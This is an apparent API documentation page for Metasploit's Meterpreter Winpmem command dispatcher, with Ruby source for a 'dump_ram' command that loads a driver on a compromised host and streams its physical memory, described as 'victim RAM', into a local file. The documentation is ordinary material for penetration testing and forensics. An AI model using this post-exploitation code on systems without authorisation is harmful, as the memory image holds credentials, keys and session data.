Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Winpmem

Inherits:
Object
  • Object
Includes:
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher
Defined in:
lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb

Constant Summary

Klass =
Console::CommandDispatcher::Winpmem
WINPMEM_ERROR_SUCCESS =
0
WINPMEM_ERROR_FAILED_LOAD_DRIVER =
1
WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY =
2
WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY =
3
WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL =
4
WINPMEM_ERROR_UNKNOWN =
255

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #initialize, #log_error, #msf_loaded?, set_hash, #unknown_command

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_dump_ram(*args) ⇒ Object



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb', line 38

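# Console command: acquire the remote host's physical memory through the
# winpmem extension and stream it into a local file.
#
# The resulting file is a raw RAM image. It holds whatever was resident in
# memory at acquisition time (credentials, key material, session data), so
# it should be stored and handled like any other sensitive evidence.
#
# @param args [Array<String>] args[0] is the local path of the output file
# @return [true, nil] nil when only the usage text is printed, true otherwise
def cmd_dump_ram(*args)
  unless args[0]
    print_error("Usage: dump_ram [output_file]")
    return
  end
  path_raw = args[0]

  # Request owner-only permissions because the image contains secrets. The
  # mode is applied only when the file is created and is largely ignored on
  # Windows hosts. Note that 'wb+' truncates an existing file immediately,
  # even if the acquisition fails afterwards.
  fd = ::File.new(path_raw, 'wb+', 0o600)
  channel = nil
  begin
    memory_size, response_code, channel = client.winpmem.dump_ram
    case response_code
    when WINPMEM_ERROR_FAILED_LOAD_DRIVER
      print_error("Failed to load the driver")
      return true
    when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY
      print_error("Failed to get the memory geometry")
      return true
    when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY
      print_error("Failed to allocate memory")
      return true
    when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL
      print_error("Failed to open the meterpreter Channel")
      return true
    when WINPMEM_ERROR_UNKNOWN
      # Previously fell through and was reported as a successful driver load.
      print_error("Unknown error while dumping memory")
      return true
    end
    if channel.nil?
      # Without a channel there is nothing to read; fail cleanly instead of
      # raising NoMethodError on nil.
      print_error("No channel returned for the memory dump")
      return true
    end
    print_good("Driver PMEM loaded successfully")
    #Arbitrary big buffer size, could be optimized
    buffer_size = 2 ** 17
    bytes_read = 0
    next_message_byte = memory_size / 10
    print_good("Dumping #{memory_size} bytes (press Ctrl-C to abort)")
    data = channel.read(buffer_size)
    # NOTE(review): if the channel reports eof right after the final read,
    # that last chunk is not written - confirm against the channel's eof
    # semantics.
    until channel.eof || data.nil?
      fd.write(data)
      bytes_read += data.length
      data = channel.read(buffer_size)
      if bytes_read >= next_message_byte
        print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded")
        next_message_byte += memory_size / 10
      end
    end
    print_status("Download completed")
  ensure
    # Runs on every exit path (error return, Ctrl-C, exception) so the local
    # file handle is never leaked.
    print_status("Unloading driver") if channel
    fd.close
    #Unload the driver on channel close
    channel.close if channel
  end
  return true
end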

#commands ⇒ Object

List of supported commands.



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb', line 25

# Command table for this dispatcher: maps each console command name to the
# one-line description shown in help output.
#
# @return [Hash{String => String}]
def commands
  supported = {}
  supported['dump_ram'] = 'Dump victim RAM'
  supported
end

#name ⇒ Object

Name for this dispatcher



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb', line 18

# Display name of this command dispatcher.
#
# @return [String]
def name
  dispatcher_name = 'Winpmem'
  dispatcher_name
end